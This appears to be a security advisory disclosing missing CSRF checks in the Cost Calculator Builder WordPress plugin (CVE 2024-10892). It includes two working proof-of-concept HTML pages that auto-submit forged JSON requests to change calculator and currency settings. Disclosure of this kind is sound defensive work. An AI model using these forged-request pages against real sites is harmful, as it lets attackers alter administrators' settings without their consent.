Cost Calculator Builder < 3.2.43 – Settings update via CSRF | CVE 2024-10892

Description

The plugin does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.

Proof of Concept

`calc_save_settings` AJAX action:

Load the following HTML page while logged in as a privileged user on the WordPress site (replace "12345" with the calculator ID). Note that the title is changed to "My Form".

```
<html>
  <body>
    <form action="https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=calc_save_settings" method="POST" enctype="text/plain">
      <input
        type="hidden"
        name="{&quot;id&quot;:12345,&quot;title&quot;:&quot;My Form&quot;,&quot;foo"
        value="&quot;:&quot;bar&quot;}"
      >
    </form>
    <input type="submit">
    <script>document.forms[0].submit();</script>
  </body>
</html>
```
---
`save_general_settings` AJAX action:

Load the following HTML page while logged in as a privileged user on the WordPress site. Note that the "Currency Sign" setting is changed to "CAD".

<html>
  <body>
    <form action="https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=calc_save_general_settings" method="POST" enctype="text/plain">
      <input
        type="hidden"
        name="{&quot;settings&quot;:{&quot;currency&quot;:{&quot;use_in_all&quot;:true,&quot;currency&quot;:&quot;CAD&quot;,&quot;num_after_integer&quot;:2,&quot;decimal_separator&quot;:&quot;.&quot;,&quot;thousands_separator&quot;:&quot;,&quot;,&quot;currencyPosition&quot;:&quot;left_with_space&quot;}},&quot;foo"
        value="&quot;:&quot;bar&quot;}"
      >
    </form>
    <input type="submit">
    <script>document.forms[0].submit();</script>
  </body>
</html>